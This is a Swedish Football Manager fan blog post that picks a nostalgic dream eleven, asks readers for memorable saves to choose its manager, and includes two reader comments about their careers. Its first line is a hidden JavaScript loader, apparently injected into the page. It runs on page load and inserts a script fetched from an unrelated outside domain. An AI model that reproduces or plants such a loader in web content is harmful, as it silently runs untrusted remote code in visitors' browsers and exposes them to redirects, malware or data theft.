;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Manager – FMSweden
Meny Stäng

Lirare vi minns: Manager

Det är dags att ta ut en drömelva på lirare vi minns från tidiga upplagor. Det kan antingen vara spelare som varit outstanding överlag eller gömda guldkorn som varit bra för just er. Vilken upplaga av spelet spelar ingen roll. Ni nominerar spelare för varje position, jag läser på om spelarna, värderar hur många som tycker om samma spelare och sen tar jag ut vinnaren. Tillslut har vi en drömelva av lirare vi minns.

Akinfeev
Vanden Borre – Balanta –  West – Bouma
Dos Santos – Kerr – Verratti – Adu
Tsigalko Palermo

Avb: Vrsaljko, Zapata, Santon, Farnerud, Guarin, Hersi, Guardado, Aghahowa, Vela

Det slutade med Tsigalko och Martin Palermo som anfallspar med Aghahowa och Carlos Vela på bänken.

Nu har vi fått fram en fin startelva och en fin (kanske lite stor) bänk. En trupp som är redo att ta över världen. Men vem ska ratta det här laget? Vem ska bli körsbäret på toppen?

För att ta reda på det vill jag att NI delger mig era mest minnesvärda resor/saves genom historien och utifrån era berättelser kommer jag välja ut någon som kommer få bli manager för det här laget.

Tex:
“Jag ledde Laholm från division 2 till Champions League kvartsfinal på CM 03/04 med några duktiga islänningar på topp.”

Please wait...

Liknande Inlägg

2 kommentarer

  1. Micke

    Har inte jättemycket att komma med här dessvärre. Gick till CL-gruppspel en gång och EL-sextondelsfinal två gånger + två ligatitlar och två ytterligare medaljer samt några cupguld med Falkenberg på FM19. Värvade endast gratisspelare och använde mig annars av regens från den egna akademin, fostrade några spelare som spelade i svenska A-landslaget med.

  2. raca14

    Lyckades vinna Allsvenskan direkt (FM11) de tre första åren jag hade igång min save med MFF och tog mig till final i CL redan det andra året med spelare som Akinfeev, Arenas, Lustig Westerberg, Millan, två unga superbrassar (Evandro Roncatto och en som jag glömt namnet på) på OMC och A m.fl

Lämna ett svar